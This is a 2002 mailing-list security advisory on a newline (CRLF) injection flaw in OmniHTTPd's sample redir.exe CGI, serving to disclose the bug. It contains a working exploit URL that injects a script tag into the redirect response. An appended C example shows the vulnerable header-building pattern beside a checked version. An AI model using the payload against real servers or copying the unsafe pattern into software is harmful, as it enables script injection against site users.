From: Matthew Murphy (mattmurphy_at_kc.rr.com)
Date: Sun Aug 25 2002 - 11:50:11 CDT


    I've discovered another vulnerability in one of the OmniHTTPd sample apps.
    This time, the culprit is "/cgi-bin/redir.exe". This app is vulnerable to a
    newline injection issue. The vulnerability occurs because the "URL" query
    parameter (case sensitive) is decoded and placed directly into the response
    as the "Location" header. If an attacker places urlencoded newlines
    ("%0D%0A") into the parameter, the headers following the "Location" header,
    as well as the resultant entity, can be controlled.

    I had a tough time exploiting this vulnerability to add headers, because
    OmniHTTPd would not add my header. :-( However, I was able to exploit this
    vulnerability to produce the following output:

    [Begin Server Response]
    HTTP/1.0 302 Redirection
    Content-Type: text/html
    Date: Sun, 25 Aug 2002 16:36:39 GMT
    Location: http://www.yahoo.com/
    Server: OmniHTTPd/2.10

    <script>alert(document.URL)</script>

    [End Server Response]

    This will pop up an alert, and then redirect to yahoo.com on browsers that
    display redirect entities (IE will not work for this).

    I was a bit puzzled by the "Server" header between the Location and the
    entity, but I figured out that OmniHTTPd was inserting the header after CGI
    processing was complete.

    Exploit URL:

    http://localhost/cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Eyahoo%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28document%2EURL%29%3C%2FSCRIPT%3E

    "The reason the mainstream is thought
    of as a stream is because it is
    so shallow."
                         - Author Unknown
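
Added example, not part of the original post and not OmniHTTPd's own code: a C redirect-header builder showing the pattern the post describes (decoded parameter copied into "Location") beside a form that refuses decoded control characters. The function names and buffer sizes are assumptions; SAMPLE is the parameter value from the post's exploit URL.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Constructed input: the URL parameter value from the post's exploit URL. */
static const char SAMPLE[] = "http%3A%2F%2Fwww%2Eyahoo%2Ecom%2F%0D%0A%0D%0A"
                             "%3CSCRIPT%3Ealert%28document%2EURL%29%3C%2FSCRIPT%3E";

static int hexval(unsigned char c) {
    return isdigit(c) ? c - '0' : isxdigit(c) ? tolower(c) - 'a' + 10 : -1;
}

/* Percent-decode src into dst. With strict set, any decoded control byte
 * (CR, LF, NUL, DEL, ...) is refused. Returns 0 on success, -1 otherwise. */
static int decode_value(const char *src, char *dst, size_t dstlen, int strict) {
    size_t o = 0;
    while (*src) {
        int byte = (unsigned char)*src++;
        if (byte == '%') {
            int hi = hexval((unsigned char)src[0]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)src[1]);
            if (lo < 0) return -1;               /* malformed escape */
            byte = hi * 16 + lo;
            src += 2;
        }
        if (strict && (byte < 0x20 || byte == 0x7f)) return -1;
        if (o + 1 >= dstlen) return -1;          /* value does not fit */
        dst[o++] = (char)byte;
    }
    dst[o] = '\0';
    return 0;
}

static int emit(const char *param, char *out, size_t outlen, int strict) {
    char v[512];                                 /* assumed size limit */
    if (decode_value(param, v, sizeof v, strict) != 0) return -1;
    int n = snprintf(out, outlen, "Location: %s\r\n", v);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* unsafe: behaviour the post describes; checked: -1 means answer with an error. */
int location_unsafe(const char *p, char *out, size_t n) { return emit(p, out, n, 0); }
int location_checked(const char *p, char *out, size_t n) { return emit(p, out, n, 1); }

int main(void) {
    char h[1024];
    printf("unsafe=%d checked=%d\n", location_unsafe(SAMPLE, h, sizeof h),
           location_checked(SAMPLE, h, sizeof h));
    return 0;
}
```

The check runs on the decoded bytes, so an encoded CR/LF is caught in the same way as a literal one.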